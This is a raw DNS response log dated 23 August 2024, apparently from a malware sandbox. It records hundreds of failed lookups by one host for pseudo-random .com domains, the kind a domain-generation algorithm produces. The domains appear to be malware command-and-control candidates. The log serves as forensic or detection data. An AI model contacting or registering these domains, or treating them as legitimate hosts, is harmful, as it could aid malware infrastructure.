Aug 23, 2024 18:48:55.233234882 CEST	1.1.1.1	192.168.2.4	0xaab2	Name error (3)	puzyduq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.235153913 CEST	1.1.1.1	192.168.2.4	0xffef	Name error (3)	qekyvup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.235862970 CEST	1.1.1.1	192.168.2.4	0x577e	Name error (3)	gahyces.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.237396002 CEST	1.1.1.1	192.168.2.4	0xd066	Name error (3)	lyrywur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.243766069 CEST	1.1.1.1	192.168.2.4	0x2a4	Name error (3)	gacyfih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.245002031 CEST	1.1.1.1	192.168.2.4	0xd63f	Name error (3)	lygyxad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.249454975 CEST	1.1.1.1	192.168.2.4	0x71aa	Name error (3)	galydyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.249763966 CEST	1.1.1.1	192.168.2.4	0x1dc5	Name error (3)	qegyxav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.253540993 CEST	1.1.1.1	192.168.2.4	0x51fb	Name error (3)	lysylun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.254687071 CEST	1.1.1.1	192.168.2.4	0xeb17	Name error (3)	pupylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.258543015 CEST	1.1.1.1	192.168.2.4	0x7e91	Name error (3)	qeqyqep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.258961916 CEST	1.1.1.1	192.168.2.4	0x61d2	Name error (3)	ganynos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.259830952 CEST	1.1.1.1	192.168.2.4	0xdcd7	Name error (3)	lykyser.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.259948969 CEST	1.1.1.1	192.168.2.4	0x1e02	Name error (3)	qebyniv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.261449099 CEST	1.1.1.1	192.168.2.4	0xbdd1	Name error (3)	pujypal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.263025045 CEST	1.1.1.1	192.168.2.4	0x3816	Name error (3)	gatykyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.263602018 CEST	1.1.1.1	192.168.2.4	0xea2d	Name error (3)	pumymap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.263925076 CEST	1.1.1.1	192.168.2.4	0x1ece	Name error (3)	lyvynid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.266612053 CEST	1.1.1.1	192.168.2.4	0x906c	Name error (3)	puvybuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.266623020 CEST	1.1.1.1	192.168.2.4	0xfb7b	Name error (3)	gahypoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.266632080 CEST	1.1.1.1	192.168.2.4	0x6f52	Name error (3)	qegytop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.267920017 CEST	1.1.1.1	192.168.2.4	0x3b34	Name error (3)	vocybuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.268471956 CEST	1.1.1.1	192.168.2.4	0x5e1d	Name error (3)	qetykyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.269069910 CEST	1.1.1.1	192.168.2.4	0x57b1	Name error (3)	puryjeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.272841930 CEST	1.1.1.1	192.168.2.4	0xc879	Name error (3)	vonymoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.275753021 CEST	1.1.1.1	192.168.2.4	0x39a6	Name error (3)	qedylig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.280313969 CEST	1.1.1.1	192.168.2.4	0xc19c	Name error (3)	qekysel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.288093090 CEST	1.1.1.1	192.168.2.4	0x9be	Name error (3)	lyryjej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.292982101 CEST	1.1.1.1	192.168.2.4	0x8145	Name error (3)	vojypat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.340410948 CEST	1.1.1.1	192.168.2.4	0x121	Name error (3)	vofypam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.370682001 CEST	1.1.1.1	192.168.2.4	0x4f8f	Name error (3)	qexyfuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.371293068 CEST	1.1.1.1	192.168.2.4	0x4878	Name error (3)	vofyzof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.406666994 CEST	1.1.1.1	192.168.2.4	0xf4a5	Name error (3)	volydyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.420355082 CEST	1.1.1.1	192.168.2.4	0x7cc4	Name error (3)	vopykum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.756819963 CEST	1.1.1.1	192.168.2.4	0x95a7	Name error (3)	gacyvub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.758322001 CEST	1.1.1.1	192.168.2.4	0xe58f	Name error (3)	qexyvyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.759840012 CEST	1.1.1.1	192.168.2.4	0x2d2c	Name error (3)	gaqyhaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.760462999 CEST	1.1.1.1	192.168.2.4	0xa209	Name error (3)	puzyceg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761198997 CEST	1.1.1.1	192.168.2.4	0x20e2	Name error (3)	pufytip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.761337996 CEST	1.1.1.1	192.168.2.4	0x4af9	Name error (3)	vofyruc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762768030 CEST	1.1.1.1	192.168.2.4	0x8a5	Name error (3)	gadyrus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.762867928 CEST	1.1.1.1	192.168.2.4	0xdccf	Name error (3)	qedyruv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763081074 CEST	1.1.1.1	192.168.2.4	0xe230	Name error (3)	pumygil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.763293028 CEST	1.1.1.1	192.168.2.4	0xf87b	Name error (3)	lysywyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764090061 CEST	1.1.1.1	192.168.2.4	0xa5e8	Name error (3)	ganyfuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764101028 CEST	1.1.1.1	192.168.2.4	0x9a8a	Name error (3)	galycah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764111042 CEST	1.1.1.1	192.168.2.4	0xd34c	Name error (3)	qekyxaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764121056 CEST	1.1.1.1	192.168.2.4	0xb811	Name error (3)	pujyxoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764236927 CEST	1.1.1.1	192.168.2.4	0x780	Name error (3)	vopyqef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.764906883 CEST	1.1.1.1	192.168.2.4	0xb32a	Name error (3)	gatyqeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.766196012 CEST	1.1.1.1	192.168.2.4	0xd951	Name error (3)	qebyfup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.766206026 CEST	1.1.1.1	192.168.2.4	0x8b3a	Name error (3)	vojyzik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.766216040 CEST	1.1.1.1	192.168.2.4	0x389e	Name error (3)	lyvyfux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.767354965 CEST	1.1.1.1	192.168.2.4	0x9584	Name error (3)	qetyqag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.769342899 CEST	1.1.1.1	192.168.2.4	0x2514	Name error (3)	lygylur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.769620895 CEST	1.1.1.1	192.168.2.4	0x870d	Name error (3)	qegylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.769630909 CEST	1.1.1.1	192.168.2.4	0x2c4d	Name error (3)	vocydyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.769676924 CEST	1.1.1.1	192.168.2.4	0x8a86	Name error (3)	vowymom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.770111084 CEST	1.1.1.1	192.168.2.4	0x87a8	Name error (3)	vofykyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.770203114 CEST	1.1.1.1	192.168.2.4	0xd7d	Name error (3)	lyxysad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.771351099 CEST	1.1.1.1	192.168.2.4	0xfb8e	Name error (3)	gadykyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.771611929 CEST	1.1.1.1	192.168.2.4	0xc073	Name error (3)	puvydyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.772372007 CEST	1.1.1.1	192.168.2.4	0xec12	Name error (3)	lymynuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.773952961 CEST	1.1.1.1	192.168.2.4	0x47da	Name error (3)	volypof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.774882078 CEST	1.1.1.1	192.168.2.4	0xe11e	Name error (3)	galypob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.775213957 CEST	1.1.1.1	192.168.2.4	0x2d20	Name error (3)	qedykep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.775404930 CEST	1.1.1.1	192.168.2.4	0xfbab	Name error (3)	vonybuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.775568962 CEST	1.1.1.1	192.168.2.4	0xd2c4	Name error (3)	ganyvyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.776571989 CEST	1.1.1.1	192.168.2.4	0x6022	Name error (3)	lygytix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.776582003 CEST	1.1.1.1	192.168.2.4	0x1130	Name error (3)	pupyjap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.776591063 CEST	1.1.1.1	192.168.2.4	0x60a1	Name error (3)	qekytig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.777380943 CEST	1.1.1.1	192.168.2.4	0xb429	Name error (3)	qebyvyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.777506113 CEST	1.1.1.1	192.168.2.4	0x1506	Name error (3)	lyvyver.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.777515888 CEST	1.1.1.1	192.168.2.4	0xae74	Name error (3)	pujytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.777523994 CEST	1.1.1.1	192.168.2.4	0xcd8a	Name error (3)	vojyrum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.780073881 CEST	1.1.1.1	192.168.2.4	0x3cad	Name error (3)	purymog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.780164003 CEST	1.1.1.1	192.168.2.4	0xd617	Name error (3)	qeqyhol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.780174971 CEST	1.1.1.1	192.168.2.4	0x32cf	Name error (3)	gatyhos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.780427933 CEST	1.1.1.1	192.168.2.4	0xf87f	Name error (3)	lyxyvyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.780437946 CEST	1.1.1.1	192.168.2.4	0x8857	Name error (3)	vowyjak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.782243013 CEST	1.1.1.1	192.168.2.4	0xf834	Name error (3)	volycem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.782752991 CEST	1.1.1.1	192.168.2.4	0xcf36	Name error (3)	vonygit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.787786961 CEST	1.1.1.1	192.168.2.4	0x6d27	Name error (3)	pupywyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.788520098 CEST	1.1.1.1	192.168.2.4	0x8fd	Name error (3)	lyryman.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.788662910 CEST	1.1.1.1	192.168.2.4	0xa505	Name error (3)	gahyziw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.788674116 CEST	1.1.1.1	192.168.2.4	0x6392	Name error (3)	lykyxoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.792717934 CEST	1.1.1.1	192.168.2.4	0x5ef	Name error (3)	gacydes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.793431044 CEST	1.1.1.1	192.168.2.4	0xb1b3	Name error (3)	gaqynih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.794015884 CEST	1.1.1.1	192.168.2.4	0x933	Name error (3)	pufylul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.794025898 CEST	1.1.1.1	192.168.2.4	0x8f24	Name error (3)	qexysev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.794034958 CEST	1.1.1.1	192.168.2.4	0x81ea	Name error (3)	qeqyniq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.796654940 CEST	1.1.1.1	192.168.2.4	0x7cd6	Name error (3)	pumybuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.796905994 CEST	1.1.1.1	192.168.2.4	0xff3d	Name error (3)	lymygor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.798624039 CEST	1.1.1.1	192.168.2.4	0x1c4f	Name error (3)	lykytin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.798867941 CEST	1.1.1.1	192.168.2.4	0x3a4e	Name error (3)	puzypav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.799560070 CEST	1.1.1.1	192.168.2.4	0xd5db	Name error (3)	vopyjac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.799812078 CEST	1.1.1.1	192.168.2.4	0xe2f2	Name error (3)	qetyhov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.800276041 CEST	1.1.1.1	192.168.2.4	0xe0ee	Name error (3)	lysyjex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.815996885 CEST	1.1.1.1	192.168.2.4	0x6d9f	Name error (3)	lyrygid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.816464901 CEST	1.1.1.1	192.168.2.4	0x693e	Name error (3)	puvycel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.817302942 CEST	1.1.1.1	192.168.2.4	0xbc65	Name error (3)	purygiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.817823887 CEST	1.1.1.1	192.168.2.4	0x208c	Name error (3)	gacycaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.818459034 CEST	1.1.1.1	192.168.2.4	0xdc8b	Name error (3)	vowyguf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.818947077 CEST	1.1.1.1	192.168.2.4	0x9e0f	Name error (3)	galyzus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.819122076 CEST	1.1.1.1	192.168.2.4	0xb0e7	Name error (3)	qexyxop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821295023 CEST	1.1.1.1	192.168.2.4	0x5dfb	Name error (3)	puzyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821477890 CEST	1.1.1.1	192.168.2.4	0x98d4	Name error (3)	lymyfyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821739912 CEST	1.1.1.1	192.168.2.4	0xb31e	Name error (3)	lyxyxox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.821968079 CEST	1.1.1.1	192.168.2.4	0x275f	Name error (3)	volyzic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.822156906 CEST	1.1.1.1	192.168.2.4	0x16a1	Name error (3)	lysymor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.825539112 CEST	1.1.1.1	192.168.2.4	0xc83d	Name error (3)	vonydem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.825747013 CEST	1.1.1.1	192.168.2.4	0x18e8	Name error (3)	lykylud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.825911999 CEST	1.1.1.1	192.168.2.4	0xde21	Name error (3)	pupymol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.826415062 CEST	1.1.1.1	192.168.2.4	0x54a1	Name error (3)	pujylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.827253103 CEST	1.1.1.1	192.168.2.4	0xda3a	Name error (3)	qetynup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.828213930 CEST	1.1.1.1	192.168.2.4	0xa31d	Name error (3)	lyvysaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.829629898 CEST	1.1.1.1	192.168.2.4	0xe4ef	Name error (3)	vojykyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.829718113 CEST	1.1.1.1	192.168.2.4	0x45bc	Name error (3)	puvypoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.829727888 CEST	1.1.1.1	192.168.2.4	0xc860	Name error (3)	gahykeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.837042093 CEST	1.1.1.1	192.168.2.4	0x4655	Name error (3)	pufyjag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.837084055 CEST	1.1.1.1	192.168.2.4	0x610f	Name error (3)	gaqyvys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.837094069 CEST	1.1.1.1	192.168.2.4	0x6f35	Name error (3)	vowybyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.837989092 CEST	1.1.1.1	192.168.2.4	0x45d5	Name error (3)	lyxytur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.838357925 CEST	1.1.1.1	192.168.2.4	0x4360	Name error (3)	lymyved.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.839447975 CEST	1.1.1.1	192.168.2.4	0xec60	Name error (3)	pumycav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.839544058 CEST	1.1.1.1	192.168.2.4	0xfc03	Name error (3)	gahyruh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.839554071 CEST	1.1.1.1	192.168.2.4	0xd887	Name error (3)	lygyjan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840101004 CEST	1.1.1.1	192.168.2.4	0x67fb	Name error (3)	qekyryp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840111017 CEST	1.1.1.1	192.168.2.4	0xe3c0	Name error (3)	qedyhiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840126038 CEST	1.1.1.1	192.168.2.4	0x2182	Name error (3)	gadyhoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840188980 CEST	1.1.1.1	192.168.2.4	0xb83e	Name error (3)	vopyguk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840198040 CEST	1.1.1.1	192.168.2.4	0xab83	Name error (3)	lysygij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.840207100 CEST	1.1.1.1	192.168.2.4	0xe1cb	Name error (3)	pupyguq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.841001987 CEST	1.1.1.1	192.168.2.4	0x569c	Name error (3)	lykywex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.841012001 CEST	1.1.1.1	192.168.2.4	0x9172	Name error (3)	puzytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.841902971 CEST	1.1.1.1	192.168.2.4	0x890d	Name error (3)	pufyweq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.842570066 CEST	1.1.1.1	192.168.2.4	0x9dcc	Name error (3)	qegyryq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.843575954 CEST	1.1.1.1	192.168.2.4	0x5139	Name error (3)	vofyqek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.844208002 CEST	1.1.1.1	192.168.2.4	0xd40c	Name error (3)	pumydyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.844676971 CEST	1.1.1.1	192.168.2.4	0xfbd4	Name error (3)	qeqyfug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.844686031 CEST	1.1.1.1	192.168.2.4	0x24b6	Name error (3)	gadyqaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.845377922 CEST	1.1.1.1	192.168.2.4	0xb3ec	Name error (3)	lygywyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.845387936 CEST	1.1.1.1	192.168.2.4	0xaa8	Name error (3)	qedyqal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.846422911 CEST	1.1.1.1	192.168.2.4	0x4c18	Name error (3)	ganydeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.846498013 CEST	1.1.1.1	192.168.2.4	0x58dc	Name error (3)	gaqyfub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.846508980 CEST	1.1.1.1	192.168.2.4	0x306f	Name error (3)	qekyluv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.847553015 CEST	1.1.1.1	192.168.2.4	0x85bb	Name error (3)	vopymit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.849560022 CEST	1.1.1.1	192.168.2.4	0xdd4f	Name error (3)	qebysaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.849992990 CEST	1.1.1.1	192.168.2.4	0x6fd8	Name error (3)	vocypok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.850321054 CEST	1.1.1.1	192.168.2.4	0x9f6a	Name error (3)	qegykeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.850534916 CEST	1.1.1.1	192.168.2.4	0xdfc5	Name error (3)	lyrynux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.852210045 CEST	1.1.1.1	192.168.2.4	0x3eb6	Name error (3)	purybup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.854387999 CEST	1.1.1.1	192.168.2.4	0x252b	Name error (3)	gacypiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.856934071 CEST	1.1.1.1	192.168.2.4	0x283f	Name error (3)	qexytil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.857652903 CEST	1.1.1.1	192.168.2.4	0xfbf4	Name error (3)	vofyjom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.857908964 CEST	1.1.1.1	192.168.2.4	0x4ed8	Name error (3)	qeqyvev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.858203888 CEST	1.1.1.1	192.168.2.4	0xd4ad	Name error (3)	galyryz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.859251022 CEST	1.1.1.1	192.168.2.4	0x5d41	Name error (3)	vonycaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.859792948 CEST	1.1.1.1	192.168.2.4	0x92f4	Name error (3)	ganycob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.965291977 CEST	1.1.1.1	192.168.2.4	0xf431	Name error (3)	vocycat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.980256081 CEST	1.1.1.1	192.168.2.4	0x3788	Name error (3)	gatyniz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:55.991851091 CEST	1.1.1.1	192.168.2.4	0xf878	Name error (3)	volyrut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.005856037 CEST	1.1.1.1	192.168.2.4	0x60a3	Name error (3)	qebyxog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.007225037 CEST	1.1.1.1	192.168.2.4	0x1cfd	Name error (3)	lyvyxin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.007850885 CEST	1.1.1.1	192.168.2.4	0xc948	Name error (3)	qetyfyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.009116888 CEST	1.1.1.1	192.168.2.4	0x6c0e	Name error (3)	lyryfyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.009375095 CEST	1.1.1.1	192.168.2.4	0x33ac	Name error (3)	purydel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.009386063 CEST	1.1.1.1	192.168.2.4	0x40a5	Name error (3)	vocyzum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.009393930 CEST	1.1.1.1	192.168.2.4	0xb4d4	Name error (3)	qegyqov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.009772062 CEST	1.1.1.1	192.168.2.4	0x77c4	Name error (3)	puvyxig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.010904074 CEST	1.1.1.1	192.168.2.4	0xbb57	Name error (3)	lygymod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011538029 CEST	1.1.1.1	192.168.2.4	0x6881	Name error (3)	lymysox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011548996 CEST	1.1.1.1	192.168.2.4	0x5665	Name error (3)	lyxylyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.011677980 CEST	1.1.1.1	192.168.2.4	0x9b7c	Name error (3)	qexyluq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.012356997 CEST	1.1.1.1	192.168.2.4	0x439c	Name error (3)	pufymiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.013118029 CEST	1.1.1.1	192.168.2.4	0xa083	Name error (3)	puzylyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.013439894 CEST	1.1.1.1	192.168.2.4	0xdb14	Name error (3)	gaqydaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.014960051 CEST	1.1.1.1	192.168.2.4	0x7be5	Name error (3)	qeqysap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.015064955 CEST	1.1.1.1	192.168.2.4	0x1d05	Name error (3)	volykek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.015075922 CEST	1.1.1.1	192.168.2.4	0x7c3	Name error (3)	galykew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.016014099 CEST	1.1.1.1	192.168.2.4	0x1388	Name error (3)	qedynug.com	none	none	A (IP address)	IN (0x0001)	false
